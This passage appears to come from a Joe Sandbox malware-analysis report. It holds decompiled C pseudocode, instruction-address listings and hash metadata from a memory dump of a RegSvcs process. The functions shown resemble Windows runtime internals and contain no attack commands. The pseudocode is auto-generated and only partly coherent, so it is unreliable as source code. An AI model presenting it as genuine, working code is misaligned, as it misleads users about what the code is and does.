								 *0x10a87e0 = _t18;
								continue;
							}
						}
						goto L9;
					}
				}
				L9:
				__eflags =  *0x10a5cd0;
				if( *0x10a5cd0 <= 0) {
					L00FB7055(_t37);
				} else {
					_t30 = _t37 + 8;
					_t34 =  *0x10a87e8; // 0x0
					__eflags =  *_t34 - _t35;
					if( *_t34 != _t35) {
						goto L8;
					} else {
						 *_t30 = _t35;
						 *((intOrPtr*)(_t30 + 4)) = _t34;
						 *_t34 = _t30;
						 *0x10a87e8 = _t30;
						 *0x10a87e0 = _t18 + 1;
					}
				}
				 *(_t38 - 4) = 0xfffffffe;
				return E0100D0D1(L01044320());
			}

0x01044257
0x01044257
0x01044257
0x01044259
0x0104425e
0x01044263
0x01044265
0x01044273
0x01044278
0x0104427c
0x0104427f
0x01044281
0x01044287
0x010442d7
0x010442d7
0x010442da
0x0104428d
0x0104428d
0x0104428f
0x01044292
0x01044297
0x0104429c
0x010442a0
0x010442a6
0x010442a8
0x010442ae
0x010442b3
0x00000000
0x010442ba
0x010442ba
0x010442bf
0x010442c5
0x010442ca
0x010442cf
0x010442d0
0x00000000
0x010442d0
0x010442b3
0x00000000
0x010442a6
0x0104429c
0x010442dc
0x010442dc
0x010442e3
0x01044309
0x010442e5
0x010442e5
0x010442e8
0x010442ee
0x010442f0
0x00000000
0x010442f2
0x010442f2
0x010442f4
0x010442f7
0x010442f9
0x01044300
0x01044300
0x010442f0
0x0104430e
0x0104431f

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1c8ef7099fd2ae9b1477e89dcfb4a1ea10716d2aefd2a2095c62f3a5733fdecb
Instruction ID: 913e60fd668c2266716b3ec2a0b9e7d262f7d1fa570b656b84681fc41ce56ebc
Opcode Fuzzy Hash: 1c8ef7099fd2ae9b1477e89dcfb4a1ea10716d2aefd2a2095c62f3a5733fdecb
Instruction Fuzzy Hash: D22149B0900A01CFC765DF68D580B587BF1FB85356B90C2AAD1C9CB299DB3AD451CB00

Uniqueness

Uniqueness Score: -1.00%

Function 00FE2397 Relevance: .1, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 29%

			E00FE2397(intOrPtr _a4) {
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t11;
				void* _t19;
				void* _t25;
				void* _t26;
				intOrPtr _t27;
				void* _t28;
				void* _t29;

				_t27 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294));
				if( *0x10a848c != 0) {
					L00FDFAD0(0x10a8610);
					if( *0x10a848c == 0) {
						E00FDFA00(0x10a8610, _t19, _t27, 0x10a8610);
						goto L1;
					} else {
						_push(0);
						_push(_a4);
						_t26 = 4;
						_t29 = E00FE2581(0x10a8610, 0xf950a0, _t26, _t27, _t28);
						E00FDFA00(0x10a8610, 0xf950a0, _t27, 0x10a8610);
					}
				} else {
					L1:
					_t11 =  *0x10a8614; // 0x0
					if(_t11 == 0) {
						_t11 = E00FF4886(0xf91088, 1, 0x10a8614);
					}
					_push(0);
					_push(_a4);
					_t25 = 4;
					_t29 = E00FE2581(0x10a8610, (_t11 << 4) + 0xf95070, _t25, _t27, _t28);
				}
				if(_t29 != 0) {
					 *((intOrPtr*)(_t29 + 0x38)) = _t27;
					 *((char*)(_t29 + 0x40)) = 0;
				}
				return _t29;
			}

0x00fe23b0
0x00fe23b6
0x00fe2409
0x00fe2415
0x01025ae9
0x00000000
0x00fe241b
0x00fe241b
0x00fe241d
0x00fe2427
0x00fe242e
0x00fe2430
0x00fe2430
0x00fe23b8
0x00fe23b8
0x00fe23b8
0x00fe23bf
0x00fe23fc
0x00fe23fc
0x00fe23c1
0x00fe23c3
0x00fe23d0
0x00fe23d8
0x00fe23d8
0x00fe23dc
0x00fe23de
0x00fe23e1
0x00fe23e1
0x00fe23ec

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3fb533b5e3b9193b8f6b397abe3fa5db297816a33baceda242fc2385f1ec02f7
Instruction ID: f80db3d11be1166fb00da7ab01747dfccbdbbbfdb2de38e9ebb34f267d8ab6aa
Opcode Fuzzy Hash: 3fb533b5e3b9193b8f6b397abe3fa5db297816a33baceda242fc2385f1ec02f7
Instruction Fuzzy Hash: 25116B326047906BE770962A9C45F15B2CDFB50721F1C813BF64697292E97CE800BB54

Uniqueness

Uniqueness Score: -1.00%

Function 010346A7 Relevance: .1, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E010346A7(signed short* __ecx, unsigned int __edx, char* _a4) {
				signed short* _v8;
				unsigned int _v12;
				intOrPtr _v16;
				signed int _t22;
				signed char _t23;
				short _t32;
				void* _t38;
				char* _t40;

				_v12 = __edx;
				_t29 = 0;
				_v8 = __ecx;
				_v16 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
				_t38 = L00FD4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *__ecx & 0x0000ffff);
				if(_t38 != 0) {
					_t40 = _a4;
					 *_t40 = 1;
					E00FFF3E0(_t38, _v8[2],  *_v8 & 0x0000ffff);
					_t22 = _v12 >> 1;
					_t32 = 0x2e;
					 *((short*)(_t38 + _t22 * 2)) = _t32;
					 *((short*)(_t38 + 2 + _t22 * 2)) = 0;
					_t23 = E00FED268(_t38, 1);
					asm("sbb al, al");
					 *_t40 =  ~_t23 + 1;
					L00FD77F0(_v16, 0, _t38);
				} else {
					 *_a4 = 0;
					_t29 = 0xc0000017;
				}
				return _t29;
			}

0x010346b7
0x010346ba
0x010346c5
0x010346c8
0x010346d0
0x010346d4
0x010346e6
0x010346e9
0x010346f4
0x010346ff
0x01034705
0x01034706
0x0103470c
0x01034713
0x0103471b
0x01034723
0x01034725
0x010346d6
0x010346d9
0x010346db
0x010346db
0x01034732

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
Instruction ID: 24d5158a597f0f47784263fa850bf4cbc007f63a6641f4e8bc6ff66c7900e60e
Opcode Fuzzy Hash: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
Instruction Fuzzy Hash: 08112572504208BBC7019F5CD8808BEF7B9EF85300F1080AAF984CB351DA358D55D3A4

Uniqueness

Uniqueness Score: -1.00%

Function 00FF37F5 Relevance: .1, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E00FF37F5(void* __ecx, intOrPtr* __edx) {
				void* __ebx;
				void* __edi;
				signed char _t6;
				intOrPtr _t13;
				intOrPtr* _t20;
				intOrPtr* _t27;
				void* _t28;
				intOrPtr* _t29;

				_t27 = __edx;
				_t28 = __ecx;
				if(__edx == 0) {
					E00FD2280(_t6, 0x10a8550);
				}
				_t29 = E00FF387E(_t28);
				if(_t29 == 0) {
					L6:
					if(_t27 == 0) {
						E00FCFFB0(0x10a8550, _t27, 0x10a8550);
					}
					if(_t29 == 0) {
						return 0xc0000225;
					} else {
						if(_t27 != 0) {
							goto L14;
						}
						L00FD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t27, _t29);
						goto L11;
					}
				} else {
					_t13 =  *_t29;
					if( *((intOrPtr*)(_t13 + 4)) != _t29) {
						L13:
						_push(3);
						asm("int 0x29");
						L14:
						 *_t27 = _t29;
						L11:
						return 0;
					}
					_t20 =  *((intOrPtr*)(_t29 + 4));
					if( *_t20 != _t29) {
						goto L13;
					}
					 *_t20 = _t13;
					 *((intOrPtr*)(_t13 + 4)) = _t20;
					asm("btr eax, ecx");
					goto L6;
				}
			}

0x00ff37fa
0x00ff37fc
0x00ff3805
0x00ff3808
0x00ff3808
0x00ff3814
0x00ff3818
0x00ff3846
0x00ff3848
0x00ff384b
0x00ff384b
0x00ff3852
0x00000000
0x00ff3854
0x00ff3856
0x00000000
0x00000000
0x00ff3863
0x00000000
0x00ff3863
0x00ff381a
0x00ff381a
0x00ff381f
0x00ff386e
0x00ff386e
0x00ff3871
0x00ff3873
0x00ff3873
0x00ff3868
0x00000000
0x00ff3868
0x00ff3821
0x00ff3826
0x00000000
0x00000000
0x00ff3828
0x00ff382a
0x00ff3841
0x00000000
0x00ff3841

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a90610f5bea354c8a19c7d1218a2315f6f656203c9c864a85adb9e1c17cdf43d
Instruction ID: 04fc1a5b80e447b95fe8bdc9c3414733bcecffef60c76f9a92c55662908d71d6
Opcode Fuzzy Hash: a90610f5bea354c8a19c7d1218a2315f6f656203c9c864a85adb9e1c17cdf43d
Instruction Fuzzy Hash: EC0104B3D416209BC3378B19D940E36BBA6DF81BA0715406EFA458B321D738DE00E780

Uniqueness

Uniqueness Score: -1.00%

Function 00FE002D Relevance: .1, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00FE002D() {
				void* _t11;
				char* _t14;
				signed char* _t16;
				char* _t27;
				signed char* _t29;

				_t11 = E00FD7D50();
				_t27 = 0x7ffe0384;
				if(_t11 != 0) {
					_t14 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t14 = 0x7ffe0384;
				}
				_t29 = 0x7ffe0385;
				if( *_t14 != 0) {
					if(E00FD7D50() == 0) {
						_t16 = 0x7ffe0385;
					} else {
						_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t16 & 0x00000040) != 0) {
						goto L18;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(E00FD7D50() != 0) {
						_t27 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					if( *_t27 != 0) {
						if(( *( *[fs:0x30] + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						if(E00FD7D50() != 0) {
							_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
						}
						if(( *_t29 & 0x00000020) == 0) {
							goto L5;
						}
						L18:
						return 1;
					} else {
						L5:
						return 0;
					}
				}
			}

0x00fe0032
0x00fe0037
0x00fe0043
0x01024b3a
0x00fe0049
0x00fe0049
0x00fe0049
0x00fe004e
0x00fe0053
0x01024b48
0x01024b5a
0x01024b4a
0x01024b53
0x01024b53
0x01024b5f
0x00000000
0x01024b61
0x00000000
0x01024b61
0x00fe0059
0x00fe0059
0x00fe0060
0x01024b6f
0x01024b6f
0x00fe0069
0x01024b83
0x00000000
0x00000000
0x01024b90
0x01024b9b
0x01024b9b
0x01024ba4
0x00000000
0x00000000
0x01024baa
0x00000000
0x00fe006f
0x00fe006f
0x00000000
0x00fe006f
0x00fe0069

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
Instruction ID: b3994c3cf602562981a450eabd07cf6e334bee6abbf0eaef6f9909a14328d92b
Opcode Fuzzy Hash: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
Instruction Fuzzy Hash: 1C1104326056D18FD7239B29C944B3577D6AF42B54F1D00E0EE44DBB93EB6CC881E260

Uniqueness

Uniqueness Score: -1.00%

Function 00FC766D Relevance: .1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E00FC766D(void* __ecx, signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
				char _v8;
				void* _t22;
				void* _t24;
				intOrPtr _t29;
				intOrPtr* _t30;
				void* _t42;
				intOrPtr _t47;

				_push(__ecx);
				_t36 =  &_v8;
				if(E00FEF3D5( &_v8, __edx * _a4, __edx * _a4 >> 0x20) < 0) {
					L10:
					_t22 = 0;
				} else {
					_t24 = _v8 + __ecx;
					_t42 = _t24;
					if(_t24 < __ecx) {
						goto L10;
					} else {
						if(E00FEF3D5( &_v8, _a8 * _a12, _a8 * _a12 >> 0x20) < 0) {
							goto L10;
						} else {
							_t29 = _v8 + _t42;
							if(_t29 < _t42) {
								goto L10;
							} else {
								_t47 = _t29;
								_t30 = _a16;
								if(_t30 != 0) {
									 *_t30 = _t47;
								}
								if(_t47 == 0) {
									goto L10;
								} else {
									_t22 = L00FD4620(_t36,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t47);
								}
							}
						}
					}
				}
				return _t22;
			}

0x00fc7672
0x00fc767f
0x00fc7689
0x00fc76de
0x00fc76de
0x00fc768b
0x00fc7691
0x00fc7693
0x00fc7697
0x00000000
0x00fc7699
0x00fc76a8
0x00000000
0x00fc76aa
0x00fc76ad
0x00fc76b1
0x00000000
0x00fc76b3
0x00fc76b3
0x00fc76b5
0x00fc76ba
0x00fc76bc
0x00fc76bc
0x00fc76c0
0x00000000
0x00fc76c2
0x00fc76ce
0x00fc76ce
0x00fc76c0
0x00fc76b1
0x00fc76a8
0x00fc7697
0x00fc76d9

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
Instruction ID: e9c09f6f7047c6b34986f8f0ac20fe3ef4b122912f23e4f61c81758b973aa98f
Opcode Fuzzy Hash: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
Instruction Fuzzy Hash: E601883270461AAFC724AE5ECD42F5B77ADEB94760B240538B909CB250DA30DD01BBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00FB9080 Relevance: .1, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E00FB9080(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
				intOrPtr* _t51;
				intOrPtr _t59;
				signed int _t64;
				signed int _t67;
				signed int* _t71;
				signed int _t74;
				signed int _t77;
				signed int _t82;
				intOrPtr* _t84;
				void* _t85;
				intOrPtr* _t87;
				void* _t94;
				signed int _t95;
				intOrPtr* _t97;
				signed int _t99;
				signed int _t102;
				void* _t104;

				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t97 = __ecx;
				_t102 =  *(__ecx + 0x14);
				if((_t102 & 0x02ffffff) == 0x2000000) {
					_t102 = _t102 | 0x000007d0;
				}
				_t48 =  *[fs:0x30];
				if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
					_t102 = _t102 & 0xff000000;
				}
				_t80 = 0x10a85ec;
				E00FD2280(_t48, 0x10a85ec);
				_t51 =  *_t97 + 8;
				if( *_t51 != 0) {
					L6:
					return E00FCFFB0(_t80, _t97, _t80);
				} else {
					 *(_t97 + 0x14) = _t102;
					_t84 =  *0x10a538c; // 0x77996828
					if( *_t84 != 0x10a5388) {
						_t85 = 3;
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x2c);
						_push(0x108f6e8);
						E0100D0E8(0x10a85ec, _t97, _t102);
						 *((char*)(_t104 - 0x1d)) = 0;
						_t99 =  *(_t104 + 8);
						__eflags = _t99;
						if(_t99 == 0) {
							L13:
							__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
							if(__eflags == 0) {
								E010888F5(_t80, _t85, 0x10a5388, _t99, _t102, __eflags);
							}
						} else {
							__eflags = _t99 -  *0x10a86c0; // 0xb507b0
							if(__eflags == 0) {
								goto L13;
							} else {
								__eflags = _t99 -  *0x10a86b8; // 0x0
								if(__eflags == 0) {
									goto L13;
								} else {
									_t59 =  *((intOrPtr*)( *[fs:0x30] + 0xc));
									__eflags =  *((char*)(_t59 + 0x28));
									if( *((char*)(_t59 + 0x28)) == 0) {
										E00FD2280(_t99 + 0xe0, _t99 + 0xe0);
										 *(_t104 - 4) =  *(_t104 - 4) & 0x00000000;
										__eflags =  *((char*)(_t99 + 0xe5));
										if(__eflags != 0) {
											E010888F5(0x10a85ec, _t85, 0x10a5388, _t99, _t102, __eflags);
										} else {
											__eflags =  *((char*)(_t99 + 0xe4));
											if( *((char*)(_t99 + 0xe4)) == 0) {
												 *((char*)(_t99 + 0xe4)) = 1;
												_push(_t99);
												_push( *((intOrPtr*)(_t99 + 0x24)));
												E00FFAFD0();
											}
											while(1) {
												_t71 = _t99 + 8;
												 *(_t104 - 0x2c) = _t71;
												_t80 =  *_t71;
												_t95 = _t71[1];
												 *(_t104 - 0x28) = _t80;
												 *(_t104 - 0x24) = _t95;
												while(1) {
													L19:
													__eflags = _t95;
													if(_t95 == 0) {
														break;
													}
													_t102 = _t80;
													 *(_t104 - 0x30) = _t95;
													 *(_t104 - 0x24) = _t95 - 1;
													asm("lock cmpxchg8b [edi]");
													_t80 = _t102;
													 *(_t104 - 0x28) = _t80;
													 *(_t104 - 0x24) = _t95;
													__eflags = _t80 - _t102;
													_t99 =  *(_t104 + 8);
													if(_t80 != _t102) {
														continue;
													} else {
														__eflags = _t95 -  *(_t104 - 0x30);
														if(_t95 !=  *(_t104 - 0x30)) {
															continue;
														} else {
															__eflags = _t95;
															if(_t95 != 0) {
																_t74 = 0;
																 *(_t104 - 0x34) = 0;
																_t102 = 0;
																__eflags = 0;
																while(1) {
																	 *(_t104 - 0x3c) = _t102;
																	__eflags = _t102 - 3;
																	if(_t102 >= 3) {
																		break;
																	}
																	__eflags = _t74;
																	if(_t74 != 0) {
																		L49:
																		_t102 =  *_t74;
																		__eflags = _t102;
																		if(_t102 != 0) {
																			_t102 =  *(_t102 + 4);
																			__eflags = _t102;
																			if(_t102 != 0) {
																				 *0x10ab1e0(_t74, _t99);
																				 *_t102();
																			}
																		}
																		do {
																			_t71 = _t99 + 8;
																			 *(_t104 - 0x2c) = _t71;
																			_t80 =  *_t71;
																			_t95 = _t71[1];
																			 *(_t104 - 0x28) = _t80;
																			 *(_t104 - 0x24) = _t95;
																			goto L19;
																		} while (_t74 == 0);
																		goto L49;
																	} else {
																		_t82 = 0;
																		__eflags = 0;
																		while(1) {
																			 *(_t104 - 0x38) = _t82;
																			__eflags = _t82 -  *0x10a84c0;
																			if(_t82 >=  *0x10a84c0) {
																				break;
																			}
																			__eflags = _t74;
																			if(_t74 == 0) {
																				_t77 = E01089063(_t82 * 0xc +  *((intOrPtr*)(_t99 + 0x10 + _t102 * 4)), _t95, _t99);
																				__eflags = _t77;
																				if(_t77 == 0) {
																					_t74 = 0;
																					__eflags = 0;
																				} else {
																					_t74 = _t77 + 0xfffffff4;
																				}
																				 *(_t104 - 0x34) = _t74;
																				_t82 = _t82 + 1;
																				continue;
																			}
																			break;
																		}
																		_t102 = _t102 + 1;
																		continue;
																	}
																	goto L20;
																}
																__eflags = _t74;
															}
														}
													}
													break;
												}
												L20:
												 *((intOrPtr*)(_t99 + 0xf4)) =  *((intOrPtr*)(_t104 + 4));
												 *((char*)(_t99 + 0xe5)) = 1;
												 *((char*)(_t104 - 0x1d)) = 1;
												goto L21;
											}
										}
										L21:
										 *(_t104 - 4) = 0xfffffffe;
										E00FB922A(_t99);
										_t64 = E00FD7D50();
										__eflags = _t64;
										if(_t64 != 0) {
											_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
										} else {
											_t67 = 0x7ffe0386;
										}
										__eflags =  *_t67;
										if( *_t67 != 0) {
											_t67 = E01088B58(_t99);
										}
										__eflags =  *((char*)(_t104 - 0x1d));
										if( *((char*)(_t104 - 0x1d)) != 0) {
											__eflags = _t99 -  *0x10a86c0; // 0xb507b0
											if(__eflags != 0) {
												__eflags = _t99 -  *0x10a86b8; // 0x0
												if(__eflags == 0) {
													_t94 = 0x10a86bc;
													_t87 = 0x10a86b8;
													goto L27;
												} else {
													__eflags = _t67 | 0xffffffff;
													asm("lock xadd [edi], eax");
													if(__eflags == 0) {
														E00FB9240(_t80, _t99, _t99, _t102, __eflags);
													}
												}
											} else {
												_t94 = 0x10a86c4;
												_t87 = 0x10a86c0;
												L27:
												E00FE9B82(_t80, _t87, _t94, _t99, _t102, __eflags);
											}
										}
									} else {
										goto L13;
									}
								}
							}
						}
						return E0100D130(_t80, _t99, _t102);
					} else {
						 *_t51 = 0x10a5388;
						 *((intOrPtr*)(_t51 + 4)) = _t84;
						 *_t84 = _t51;
						 *0x10a538c = _t51;
						goto L6;
					}
				}
			}

0x00fb9082
0x00fb9083
0x00fb9084
0x00fb9085
0x00fb9087
0x00fb9096
0x00fb9098
0x00fb9098
0x00fb909e
0x00fb90a8
0x00fb90e7
0x00fb90e7
0x00fb90aa
0x00fb90b0
0x00fb90b7
0x00fb90bd
0x00fb90dd
0x00fb90e6
0x00fb90bf
0x00fb90bf
0x00fb90c7
0x00fb90cf
0x00fb90f1
0x00fb90f2
0x00fb90f4
0x00fb90f5
0x00fb90f6
0x00fb90f7
0x00fb90f8
0x00fb90f9
0x00fb90fa
0x00fb90fb
0x00fb90fc
0x00fb90fd
0x00fb90fe
0x00fb90ff
0x00fb9100
0x00fb9102
0x00fb9107
0x00fb910c
0x00fb9110
0x00fb9113
0x00fb9115
0x00fb9136
0x00fb913f
0x00fb9143
0x010137e4
0x010137e4
0x00fb9117
0x00fb9117
0x00fb911d
0x00000000
0x00fb911f
0x00fb911f
0x00fb9125
0x00000000
0x00fb9127
0x00fb912d
0x00fb9130
0x00fb9134
0x00fb9158
0x00fb915d
0x00fb9161
0x00fb9168
0x01013715
0x00fb916e
0x00fb916e
0x00fb9175
0x00fb9177
0x00fb917e
0x00fb917f
0x00fb9182
0x00fb9182
0x00fb9187
0x00fb9187
0x00fb918a
0x00fb918d
0x00fb918f
0x00fb9192
0x00fb9195
0x00fb9198
0x00fb9198
0x00fb9198
0x00fb919a
0x00000000
0x00000000
0x0101371f
0x01013721
0x01013727
0x0101372f
0x01013733
0x01013735
0x01013738
0x0101373b
0x0101373d
0x01013740
0x00000000
0x01013746
0x01013746
0x01013749
0x00000000
0x0101374f
0x0101374f
0x01013751
0x01013757
0x01013759
0x0101375c
0x0101375c
0x0101375e
0x0101375e
0x01013761
0x01013764
0x00000000
0x00000000
0x01013766
0x01013768
0x010137a3
0x010137a3
0x010137a5
0x010137a7
0x010137ad
0x010137b0
0x010137b2
0x010137bc
0x010137c2
0x010137c2
0x010137b2
0x00fb9187
0x00fb9187
0x00fb918a
0x00fb918d
0x00fb918f
0x00fb9192
0x00fb9195
0x00000000
0x00fb9195
0x00000000
0x0101376a
0x0101376a
0x0101376a
0x0101376c
0x0101376c
0x0101376f
0x01013775
0x00000000
0x00000000
0x01013777
0x01013779
0x01013782
0x01013787
0x01013789
0x01013790
0x01013790
0x0101378b
0x0101378b
0x0101378b
0x01013792
0x01013795
0x00000000
0x01013795
0x00000000
0x01013779
0x01013798
0x00000000
0x01013798
0x00000000
0x01013768
0x0101379b
0x0101379b
0x01013751
0x01013749
0x00000000
0x01013740
0x00fb91a0
0x00fb91a3
0x00fb91a9
0x00fb91b0
0x00000000
0x00fb91b0
0x00fb9187
0x00fb91b4
0x00fb91b4
0x00fb91bb
0x00fb91c0
0x00fb91c5
0x00fb91c7
0x010137da
0x00fb91cd
0x00fb91cd
0x00fb91cd
0x00fb91d2
0x00fb91d5
0x00fb9239
0x00fb9239
0x00fb91d7
0x00fb91db
0x00fb91e1
0x00fb91e7
0x00fb91fd
0x00fb9203
0x00fb921e
0x00fb9223
0x00000000
0x00fb9205
0x00fb9205
0x00fb9208
0x00fb920c
0x00fb9214
0x00fb9214
0x00fb920c
0x00fb91e9
0x00fb91e9
0x00fb91ee
0x00fb91f3
0x00fb91f3
0x00fb91f3
0x00fb91e7
0x00000000
0x00000000
0x00000000
0x00fb9134
0x00fb9125
0x00fb911d
0x00fb914e
0x00fb90d1
0x00fb90d1
0x00fb90d3
0x00fb90d6
0x00fb90d8
0x00000000
0x00fb90d8
0x00fb90cf

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6b1ed06c89061d85d15acfe16bdc45db1841fe768dbe0ae12f6037a66a22062c
Instruction ID: 3b6f9e7b7d540ef23b2322e06f2c4362ffbc1aa2a38da9aaf57e3c287b53ed81
Opcode Fuzzy Hash: 6b1ed06c89061d85d15acfe16bdc45db1841fe768dbe0ae12f6037a66a22062c
Instruction Fuzzy Hash: 3301F473A056008FC324AF29DC40B11BBA9FF81361F258026F6018B792C3B5DC41DF90

Uniqueness

Uniqueness Score: -1.00%

Function 0104C450 Relevance: .1, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E0104C450(intOrPtr* _a4) {
				signed char _t25;
				intOrPtr* _t26;
				intOrPtr* _t27;

				_t26 = _a4;
				_t25 =  *(_t26 + 0x10);
				if((_t25 & 0x00000003) != 1) {
					_push(0);
					_push(0);
					_push(0);
					_push( *((intOrPtr*)(_t26 + 8)));
					_push(0);
					_push( *_t26);
					E00FF9910();
					_t25 =  *(_t26 + 0x10);
				}
				if((_t25 & 0x00000001) != 0) {
					_push(4);
					_t7 = _t26 + 4; // 0x4
					_t27 = _t7;
					_push(_t27);
					_push(5);
					_push(0xfffffffe);
					E00FF95B0();
					if( *_t27 != 0) {
						_push( *_t27);
						E00FF95D0();
					}
				}
				_t8 = _t26 + 0x14; // 0x14
				if( *((intOrPtr*)(_t26 + 8)) != _t8) {
					L00FD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t26 + 8)));
				}
				_push( *_t26);
				E00FF95D0();
				return L00FD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t26);
			}

0x0104c458
0x0104c45d
0x0104c466
0x0104c468
0x0104c469
0x0104c46a
0x0104c46b
0x0104c46e
0x0104c46f
0x0104c471
0x0104c476
0x0104c476
0x0104c47c
0x0104c47e
0x0104c480
0x0104c480
0x0104c483
0x0104c484
0x0104c486
0x0104c488
0x0104c48f
0x0104c491
0x0104c493
0x0104c493
0x0104c48f
0x0104c498
0x0104c49e
0x0104c4ad
0x0104c4ad
0x0104c4b2
0x0104c4b4
0x0104c4cd

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
Instruction ID: 7b498667a4b62357815d5cd8ec5522ffc4e90a789b8717d8fcdfd02d02e4a089
Opcode Fuzzy Hash: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
